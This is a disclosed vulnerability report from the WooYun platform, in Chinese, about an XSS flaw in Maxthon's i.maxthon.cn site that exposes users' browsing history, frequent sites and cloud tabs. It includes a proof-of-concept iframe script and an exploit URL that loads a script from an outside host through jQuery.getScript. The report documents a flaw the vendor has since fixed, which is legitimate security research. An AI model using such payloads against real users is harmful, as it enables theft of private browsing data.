当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108027

漏洞标题:利用傲游浏览器一处缺陷读取用户敏感信息如常见的历史记录

相关厂商:傲游

漏洞作者: 梧桐雨

提交时间:2015-04-15 10:38

修复时间:2015-07-14 15:58

公开时间:2015-07-14 15:58

漏洞类型:远程代码执行

危害等级:高

自评Rank:12

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-15: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-06-09: 细节向核心白帽子及相关领域专家公开
2015-06-19: 细节向普通白帽子公开
2015-06-29: 细节向实习白帽子公开
2015-07-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

嗯,还可以这么用!

详细说明:

标题不写太明显。其实是可以读取用户的:(经常访问网址、历史记录、云标签) 这些都算敏感信息了。
记得我在之前提交的漏洞里:http://wooyun.org/bugs/wooyun-2010-093779 写到可以利用这个漏洞安装任意插件,显然是大材小用了。受到乌云案例的启发,实际上这个漏洞可以用来读取经常访问的网址+历史记录+云标签。原因是因为i.maxthon.cn 有权限去调用那些敏感内容。
在对傲游浏览器大概审查了之后发现暂时没有可以利用的点,于是迂回回来i.maxthon.cn。找了两天之后,发现了一个敏感的url。通过爬虫发现:
http://i.maxthon.cn/data/showlist.html
里面的新闻链接:

url.jpg


发现url调用,尝试去通过伪协议触发他:

domain.jpg


当然找这xss也是一波三折,中途还有一些非常有意思的点这里就不一一细说了。
因为我们的xss不是在根目录下,但是处于同个域。因此我们可以通过js创建动态的iframe。再根据contentWindow.document.getElementById 就能读取i.maxthon.cn任意的id里面的html内容。

漏洞证明:

读取常去网址的poc:

var s=document.createElement("iframe");
s.src="http://i.maxthon.cn";
s.onload=function(){alert(s.contentWindow.document.getElementById("main-favorites-list").innerHTML)};document.body.appendChild(s);


如何引入?因为测试的过程中发现过滤了一些符号,但是因为你们的网站采用了jq。因此可以用jq去调用他。
exp:
http://i.maxthon.cn/news/article/?url=javascript:jQuery.getScript(%22http://wutongyu.info/mx.js%22)
访问上面url之后会弹出常去的网站内容:

url2.jpg


如果要访问上次去过的网站则直接修改对应的dom节点即可,远程获取因为你们有调用jq,直接写一个ajax也不难。这里不再阐述。

修复方案:

过滤xss,另外i.maxthon.cn站点权限是否大了些呢?不过该站点的xss的确已经非常难找了。。

版权声明:转载请注明来源 梧桐雨@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-15 15:57

厂商回复:

XSS

最新状态:

2015-04-16:已修复

漏洞评价:

评论

  1. 2015-07-14 16:08 | milan ( 普通白帽子 | Rank:129 漏洞数:32 | 妈妈说:搬不完砖就别回家。)

    学习了